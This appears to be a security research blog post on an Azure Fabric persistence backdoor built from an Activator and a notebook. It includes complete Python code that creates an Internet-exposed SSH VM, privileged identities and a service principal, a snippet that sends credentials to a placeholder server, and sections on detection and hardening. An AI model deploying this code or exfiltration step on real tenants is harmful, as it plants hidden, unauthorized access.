Intro
This blog post discusses the creation of a backdoor in Azure Fabric, previously presented at the DefCon 33 conference in Las Vegas, within the Cloud Village, by Viktor Gazdag, Principal Security Consultant at NCC Group.
A video of the talk can be viewed here:
Azure Fabric is a SaaS-based, end-to-end analytics platform that unifies tools and services such as Power BI, Data Lakehouse, data pipelines, Data Warehouse, Data Factory and databases into one portal. The platform's main function is to ingest and process data, with engineers applying arbitrary code to it, and then to build reports from the results.
Proof of Concept Backdoor
Since the platform is designed for automated data manipulation that requires code execution, there are naturally multiple places to execute code, such as pipelines, user-defined functions, Spark jobs and notebooks. To introduce another angle and delay code execution to conceal presence, a combination of a notebook and Activator is used to run Python code that creates the backdoor access.
Activator is an event detection and monitoring engine in Fabric that can automatically trigger actions when a condition is met. This service monitors workspace events, such as an item being successfully created or updated. There are additional Fabric event sources, such as Job events, OneLake events and Azure Blob Storage events, but the proof-of-concept (PoC) backdoor specifically looks for workspace events that happened in one workspace.
A notebook is an interactive web-based environment capable of using different programming languages for data exploration, analysis and transformation. One of the supported languages is Python. In addition, central public package repositories are also supported. The Azure Python SDK is available in the public repository and reduces the amount of code required to execute the post-exploitation steps. It is used to log in as a service principal that has the Owner role on a resource group and to manage resources in the Azure subscription. The activities include the creation of another service principal, a virtual machine with a public IP address and an assigned managed identity, plus a network security group allowing SSH from the Internet.
The PoC does not hide any of the code or its output; instead, it prints out the virtual machine's IP address, the admin username with password and the managed identity name. The notebook allows hiding the input and output of the code, but these can be revealed with a single click. One method to further hide the content is to package the code in wheel format and upload it as a custom Python package that can be installed and then called within the notebook. Instead of printing the results in the logs, the data can be sent to a controlled web server.
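As an illustration of that last point, here is a minimal sketch of sending the deployment results to a controlled web server instead of printing them, using only the Python standard library. The endpoint URL and the field names are placeholders, not part of the original PoC:

```python
import json
import urllib.request

def send_results(vm_ip, username, password, identity_name,
                 endpoint="https://example.invalid/collect"):
    """Post the deployment details as JSON to a controlled web server."""
    payload = json.dumps({
        "ip": vm_ip,
        "user": username,
        "password": password,
        "identity": identity_name,
    }).encode()
    req = urllib.request.Request(
        endpoint, data=payload,
        headers={"Content-Type": "application/json"})
    try:
        urllib.request.urlopen(req, timeout=5)
    except OSError:
        pass  # fail silently so no error shows up in the notebook output
```

Swallowing the exception is deliberate here: a failed request would otherwise leave a traceback in the notebook run history.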
By default, the notebook runs in the name of the user. If you want to use a managed identity or a service principal instead, you have to enable and configure it; Fabric then takes care of the managed identity and its lifecycle. This also means that if you want to access and modify resources outside of Fabric, your user or managed identity requires additional permissions.
The next sections discuss the components of the backdoor and some details of how to use the Azure Python SDK and what it is doing.
Components of The Backdoor
The service principal component is not strictly part of the backdoor, as it lives outside of Fabric, but it is required to create the virtual machine and other resources. You can look for and reuse existing service principals if they have the necessary permissions to create the resources you want. In this case, the service principal has the Owner role on the resource group itself.
It is possible to use an already available notebook that runs Azure Python SDK code and simply add the backdoor code to it, or to create a new one and bury it deep in a folder structure. By default, the notebook runs in the name of the user who created it. That is the reason the code uses a service principal with an assigned role.
The code executed in the notebook uses Python and the Azure Python SDK. It creates the following resources in an existing resource group: virtual network, subnet, network interface, virtual machine with the Ubuntu Linux operating system, operating system login credentials for the virtual machine, disk, network security group, managed identity and service principal. It also registers resource providers if it is the first time the service is used. Some of the functions also require waiting for the operation to finish, otherwise they will raise an exception. Furthermore, it assigns the Contributor role to both the managed identity and the service principal. A later section discusses more details with code examples to help understand how to use the SDK.
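The waiting requirement comes from the SDK's long-running-operation pattern: the begin_* methods return a poller object, and a dependent resource can only be created after .result() has blocked until completion. The toy class below illustrates that pattern without any Azure dependency; it is a sketch, not SDK code:

```python
class ToyPoller:
    """Mimics the poller returned by the SDK's begin_* methods."""
    def __init__(self, rounds):
        self._rounds = rounds  # pretend polling rounds until completion

    def done(self):
        return self._rounds == 0

    def result(self):
        # Block (here: a simple loop) until the operation reports
        # completion, then hand back the created resource.
        while not self.done():
            self._rounds -= 1
        return "resource-created"

# Calling result() first guarantees the prerequisite resource exists
# before anything that depends on it is created.
vnet = ToyPoller(rounds=3).result()
```

In the real PoC, skipping .result() before creating, for example, the NIC that references the subnet would raise an exception, which is why the appendix code chains .result() calls.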
Activator is used for event monitoring and action execution. It watches for specific events and, when they occur, triggers an action. The action can be sending an email, running a notebook or executing a Power Automate flow. It is also worth mentioning that at the time of the research there was at least a 30-minute delay (based on observation) between an item being created and the event showing up in the Activator monitoring menu. For the PoC, we use all workspace event items that happen in one specific workspace, and the action executes a notebook containing the backdoor code.
Lastly, permissions. The Contributor role on the workspace is the minimum permission required to create an Activator. Any additional Entra ID or Azure permissions depend on the activities the code performs (key vault access, storage access, turning off logging, etc.). In this case, the Owner role at the resource group level is required for the service principal, as user management and role assignment are performed.
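To make the permission model concrete: Azure RBAC scopes and role definition IDs are plain resource ID strings, assembled as shown below. The subscription ID and resource group name are placeholders; the helper names are ours, not SDK functions:

```python
def resource_group_scope(subscription_id: str, resource_group: str) -> str:
    """Scope string for a role assignment at resource group level."""
    return f"/subscriptions/{subscription_id}/resourceGroups/{resource_group}"

def role_definition_path(subscription_id: str, role_guid: str) -> str:
    """Full resource ID of a built-in role definition (e.g. Contributor)."""
    return (f"/subscriptions/{subscription_id}/providers/"
            f"Microsoft.Authorization/roleDefinitions/{role_guid}")

# Contributor role assigned at the scope of the "Fabric2" resource group
scope = resource_group_scope(
    "00000000-0000-0000-0000-000000000000", "Fabric2")
role_id = role_definition_path(
    "00000000-0000-0000-0000-000000000000",
    "b24988ac-6180-42a0-ab88-20f7382dd24c")
```

These are the same strings the PoC code in the appendix builds inline when calling role_assignments.create.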
Usage of Azure Python SDK
In this section, some parts of the code are discussed to help understand what to do and how. The complete source code of the PoC is available at the end of the article. It is also worth noting that the PoC code was generated with a large language model (LLM) tool (Microsoft Copilot) through several iterations and tested in an Azure test environment.
The Azure Python SDK helps create and manage resources in Azure. One of its packages is azure-identity, which helps with Entra ID authentication. Other packages from the SDK, such as azure-mgmt-compute or azure-mgmt-network, make it easier to create resources such as virtual machines, virtual disks or network security groups.
The following Azure Python SDK packages are installed with the !pip3 install command, which opens an operating system shell and installs the Python packages locally in the environment:
!pip3 install azure-mgmt-msi
!pip3 install azure-mgmt-authorization
!pip3 install msrest
!pip3 install azure-mgmt-common
!pip3 install azure-mgmt-nspkg
!pip3 install azure-mgmt-compute
!pip3 install azure-mgmt-resource
!pip3 install azure-mgmt-network
!pip3 install azure-identity
Then the classes are imported that will be used for creating the various resources in Azure and Entra ID:
from azure.identity import ClientSecretCredential
from azure.mgmt.msi import ManagedServiceIdentityClient
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.authorization import AuthorizationManagementClient
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters
from azure.core.exceptions import HttpResponseError
As an example, the azure.identity package is used for creating the login credentials, while the azure.mgmt.compute package is responsible for creating the virtual machine resource.
The ClientSecretCredential class is used to create the login credential object for signing in as a service principal. This is important because a different class is used for user login.
credential = ClientSecretCredential(
tenant_id=tenant_id,
client_id=client_id,
client_secret=client_secret
)
The values for each property are read from operating system environment variables, which are set like this:
os.environ["AZURE_TENANT_ID"] = "TenantID"
os.environ["AZURE_CLIENT_ID"] = "ClientID"
os.environ["AZURE_CLIENT_SECRET"] = "Secret"
The credential object is used by the different Azure clients, such as compute, network or managed service identity, to create the resources themselves. The following code snippet is an example of using a resource group, or creating it if it does not exist:
try:
rg = resource_client.resource_groups.get(resource_group_name)
print(f"Using existing resource group: {resource_group_name}")
return rg
except HttpResponseError:
print(f"Creating resource group: {resource_group_name}")
return resource_client.resource_groups.create_or_update(
resource_group_name,
{"location": location}
)
The following code snippet shows how the network_client from the Azure Python SDK creates a network security group that allows SSH connections from anywhere on the Internet, if one does not already exist:
def create_nsg(network_client, resource_group_name, location, nsg_name):
"""Create network security group with SSH access from the internet."""
try:
nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
print(f"Using existing NSG: {nsg_name}")
return nsg
except HttpResponseError:
print(f"Creating NSG: {nsg_name} with SSH access rule")
nsg_params = {
'location': location,
'security_rules': [
{
'name': 'AllowSSH',
'protocol': 'Tcp',
'source_port_range': '*',
'destination_port_range': '22',
'source_address_prefix': '*', # Allow from any source (internet)
'destination_address_prefix': '*',
'access': 'Allow',
'priority': 100,
'direction': 'Inbound',
'description': 'Allow SSH access from the internet'
}
]
}
return network_client.network_security_groups.begin_create_or_update(
resource_group_name,
nsg_name,
nsg_params
).result()
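For defenders, the rule above is exactly what a periodic NSG review should flag: source_address_prefix set to '*' with destination port 22 allowed inbound. The sketch below shows a restricted variant of the same rule dictionary and a simple review check; the CIDR is a placeholder for a trusted range, and the helper is ours, not an SDK function:

```python
# Restricted variant of the PoC's SSH rule (placeholder trusted range)
locked_down_ssh_rule = {
    'name': 'AllowSSHFromTrusted',
    'protocol': 'Tcp',
    'source_port_range': '*',
    'destination_port_range': '22',
    'source_address_prefix': '203.0.113.0/24',  # trusted range, not '*'
    'destination_address_prefix': '*',
    'access': 'Allow',
    'priority': 100,
    'direction': 'Inbound',
    'description': 'Allow SSH only from a trusted network range'
}

def is_open_ssh(rule):
    """Flag any rule that allows SSH inbound from the whole Internet."""
    return (rule.get('destination_port_range') == '22'
            and rule.get('source_address_prefix') == '*'
            and rule.get('access') == 'Allow')
```

Running a check like is_open_ssh over the security_rules of each NSG in a subscription is one way to surface the backdoor's most visible artifact.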
Traces Left Behind
Even though the backdoor can be hidden well in the notebook or in a new Spark environment, its activity still leaves traces behind. The notebook has a history log of runs that shows when it ran and what the output of the executed code was. In addition, every notebook has a resource explorer, which makes the additional third-party packages visible.
Spark environments have a configurable custom library where the uploaded third-party packages are visible; this should be periodically reviewed. The same periodic review applies to all of the Activator's actions. Although there is evidence that an Activator was changed or created, the event name does not explicitly state this.
Reviewing and monitoring IAM access and role assignments at the subscription and resource group level is a security best practice. This also means that service principals are periodically reviewed to confirm they have the correct permissions and roles.
The Entra ID log contains the creation, modification and login events of service principals. This log can also be fed into SIEM solutions to alert on any unauthorized modification or login.
Useful Fabric Settings
There are two tenant-level settings and one workspace-level setting that can make an attacker's life harder in the post-exploitation phase: the “Blocking Internet access”, “Private links for Azure Fabric” and “Workspace outbound access protection” options. The first blocks all access from the Internet, while the second uses private endpoints for service communication. The last option blocks Internet access at the workspace level, which cuts off Internet access from notebooks, Spark job definitions, environments, shortcuts and lakehouses.
Conclusion
The Azure Python SDK is a useful collection of packages that can be used not just for legitimate automation, but also for malicious activities. Post-exploitation activities that use built-in tools like the SDK or a notebook can be harder to catch, as they look like legitimate activities and use cases, especially when execution is delayed as in this blog post.
Appendix A – Complete Code of Azure Fabric Backdoor
#!/usr/bin/env python
import os
import random
import string
from datetime import datetime, timedelta
from azure.identity import ClientSecretCredential
from azure.mgmt.msi import ManagedServiceIdentityClient
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.authorization import AuthorizationManagementClient
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters
from azure.core.exceptions import HttpResponseError
# Service Principal credentials
os.environ["AZURE_TENANT_ID"] = "TenantID"
os.environ["AZURE_CLIENT_ID"] = "ClientID"
os.environ["AZURE_CLIENT_SECRET"] = "Secret"
os.environ["AZURE_SUBSCRIPTION_ID"] = "SubscriptionID"
os.environ["AZURE_RESOURCE_GROUP"] = "ResourceGroupName"
tenant_id = os.environ.get("AZURE_TENANT_ID", "your-tenant-id")
client_id = os.environ.get("AZURE_CLIENT_ID", "your-client-id")
client_secret = os.environ.get("AZURE_CLIENT_SECRET", "your-client-secret")
# Azure configuration
subscription_id = os.environ.get("AZURE_SUBSCRIPTION_ID", "your-subscription-id")
location = "eastus"
resource_group_name = "Fabric2"
# VM configuration
vm_name = "linux-demo-vm"
vm_username = "azureuser"
vm_password = "".join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(16))
managed_identity_name = "demo-msi"
# Role definition ID for Contributor role
contributor_role_id = "b24988ac-6180-42a0-ab88-20f7382dd24c"
def main():
# Create client credential
credential = ClientSecretCredential(
tenant_id=tenant_id,
client_id=client_id,
client_secret=client_secret
)
# Create clients
resource_client = ResourceManagementClient(credential, subscription_id)
msi_client = ManagedServiceIdentityClient(credential, subscription_id)
compute_client = ComputeManagementClient(credential, subscription_id)
network_client = NetworkManagementClient(credential, subscription_id)
auth_client = AuthorizationManagementClient(credential, subscription_id)
# Register required resource providers
register_providers(resource_client)
# Create or check resource group
create_resource_group(resource_client, resource_group_name, location)
# Create managed identity
identity = create_managed_identity(msi_client, resource_group_name, managed_identity_name, location)
print(f"Created managed identity: {identity.name} with ID: {identity.id}")
# Assign Contributor role to the managed identity
role_assignment = assign_role(
auth_client,
identity.principal_id,
contributor_role_id,
f"/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}"
)
print("Assigned Contributor role to managed identity")
# Create network resources
vnet_name = f"{vm_name}-vnet"
subnet_name = "default"
nic_name = f"{vm_name}-nic"
ip_name = f"{vm_name}-ip"
nsg_name = f"{vm_name}-nsg"
vnet, subnet = create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name)
nsg = create_nsg(network_client, resource_group_name, location, nsg_name)
nic = create_nic(network_client, resource_group_name, location, nic_name, subnet.id, ip_name)
# Create Linux VM with managed identity
vm = create_linux_vm(
compute_client,
resource_group_name,
location,
vm_name,
nic.id,
vm_username,
vm_password,
identity.id
)
# Get the public IP address for SSH access
ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name)
print("\n" + "="*50)
print("DEPLOYMENT COMPLETED SUCCESSFULLY")
print("="*50)
print(f"VM Name: {vm_name}")
print(f"Username: {vm_username}")
print(f"Password: {vm_password}") # In production, use a more secure way to handle passwords
print(f"SSH Command: ssh {vm_username}@{ip_info.ip_address}")
print(f"Managed Identity: {managed_identity_name}")
print("="*50)
def register_providers(resource_client):
"""Register necessary Azure resource providers."""
providers_to_register = [
"Microsoft.ManagedIdentity",
"Microsoft.Compute",
"Microsoft.Network",
"Microsoft.Authorization"
]
for provider in providers_to_register:
print(f"Registering provider: {provider}")
resource_client.providers.register(provider)
# Note: Registration can take time to complete. In a production scenario,
# you might want to poll for completion.
def create_resource_group(resource_client, resource_group_name, location):
"""Create a resource group if it doesn't exist."""
try:
rg = resource_client.resource_groups.get(resource_group_name)
print(f"Using existing resource group: {resource_group_name}")
return rg
except HttpResponseError:
print(f"Creating resource group: {resource_group_name}")
return resource_client.resource_groups.create_or_update(
resource_group_name,
{"location": location}
)
def create_managed_identity(msi_client, resource_group_name, identity_name, location):
"""Create a user-assigned managed identity."""
try:
return msi_client.user_assigned_identities.get(resource_group_name, identity_name)
except HttpResponseError:
# Create the managed identity
identity = msi_client.user_assigned_identities.create_or_update(
resource_group_name,
identity_name,
{"location": location}
)
# Add a small delay to allow for replication
print("Waiting for managed identity to propagate...")
import time
time.sleep(30) # Wait 30 seconds for replication
return identity
def assign_role(auth_client, principal_id, role_definition_id, scope):
"""Assign role to the managed identity."""
# Derive a GUID-length role assignment name from the principal ID
# (the first 36 characters are the principal's own GUID)
role_assignment_name = f"{principal_id}-{role_definition_id}"[:36]
role_assignment_params = RoleAssignmentCreateParameters(
role_definition_id=f"/subscriptions/{subscription_id}/providers/Microsoft.Authorization/roleDefinitions/{role_definition_id}",
principal_id=principal_id,
principal_type="ServicePrincipal" # Specify principal type to avoid replication delay issues
)
try:
return auth_client.role_assignments.create(
scope=scope,
role_assignment_name=role_assignment_name,
parameters=role_assignment_params
)
except HttpResponseError as e:
# If role assignment already exists, continue
if "already exists" in str(e):
print(f"Role assignment already exists for principal {principal_id}")
return None
raise
def create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name):
"""Create virtual network and subnet."""
try:
vnet = network_client.virtual_networks.get(resource_group_name, vnet_name)
subnet = network_client.subnets.get(resource_group_name, vnet_name, subnet_name)
print(f"Using existing vnet: {vnet_name} and subnet: {subnet_name}")
return vnet, subnet
except HttpResponseError:
print(f"Creating vnet: {vnet_name} and subnet: {subnet_name}")
vnet_params = {
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
},
'subnets': [
{
'name': subnet_name,
'address_prefix': '10.0.0.0/24'
}
]
}
vnet = network_client.virtual_networks.begin_create_or_update(
resource_group_name,
vnet_name,
vnet_params
).result()
subnet = network_client.subnets.get(
resource_group_name,
vnet_name,
subnet_name
)
return vnet, subnet
def create_nsg(network_client, resource_group_name, location, nsg_name):
"""Create network security group with SSH access from the internet."""
try:
nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
print(f"Using existing NSG: {nsg_name}")
return nsg
except HttpResponseError:
print(f"Creating NSG: {nsg_name} with SSH access rule")
nsg_params = {
'location': location,
'security_rules': [
{
'name': 'AllowSSH',
'protocol': 'Tcp',
'source_port_range': '*',
'destination_port_range': '22',
'source_address_prefix': '*', # Allow from any source (internet)
'destination_address_prefix': '*',
'access': 'Allow',
'priority': 100,
'direction': 'Inbound',
'description': 'Allow SSH access from the internet'
}
]
}
return network_client.network_security_groups.begin_create_or_update(
resource_group_name,
nsg_name,
nsg_params
).result()
def create_nic(network_client, resource_group_name, location, nic_name, subnet_id, ip_name):
"""Create network interface with public IP and associate with NSG."""
try:
nic = network_client.network_interfaces.get(resource_group_name, nic_name)
print(f"Using existing NIC: {nic_name}")
return nic
except HttpResponseError:
print(f"Creating NIC: {nic_name} with public IP: {ip_name}")
# Create public IP
public_ip_params = {
'location': location,
'sku': {
'name': 'Standard'
},
'public_ip_allocation_method': 'Static',
'public_ip_address_version': 'IPv4'
}
public_ip = network_client.public_ip_addresses.begin_create_or_update(
resource_group_name,
ip_name,
public_ip_params
).result()
# Get NSG
nsg_name = f"{vm_name}-nsg"
try:
nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
except HttpResponseError:
# Create NSG if it doesn't exist
nsg = create_nsg(network_client, resource_group_name, location, nsg_name)
# Create NIC with NSG associated
nic_params = {
'location': location,
'ip_configurations': [
{
'name': 'ipconfig1',
'subnet': {
'id': subnet_id
},
'public_ip_address': {
'id': public_ip.id
}
}
],
'network_security_group': {
'id': nsg.id
}
}
nic = network_client.network_interfaces.begin_create_or_update(
resource_group_name,
nic_name,
nic_params
).result()
# Once NIC is created, print the public IP address for SSH access
ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name)
print(f"VM will be accessible via SSH at: {ip_info.ip_address}")
return nic
def create_linux_vm(compute_client, resource_group_name, location, vm_name, nic_id,
admin_username, admin_password, identity_id):
"""Create a Linux virtual machine with a managed identity attached."""
print(f"Creating VM: {vm_name}")
vm_params = {
'location': location,
'os_profile': {
'computer_name': vm_name,
'admin_username': admin_username,
'admin_password': admin_password,
'linux_configuration': {
'disable_password_authentication': False
}
},
'hardware_profile': {
'vm_size': 'Standard_DS1_v2'
},
'storage_profile': {
'image_reference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '18.04-LTS',
'version': 'latest'
},
'os_disk': {
'create_option': 'FromImage',
'managed_disk': {
'storage_account_type': 'Premium_LRS'
}
}
},
'network_profile': {
'network_interfaces': [
{
'id': nic_id,
'primary': True
}
]
},
'identity': {
'type': 'UserAssigned',
'user_assigned_identities': {
identity_id: {}
}
}
}
return compute_client.virtual_machines.begin_create_or_update(
resource_group_name,
vm_name,
vm_params
).result()
if __name__ == "__main__":
main()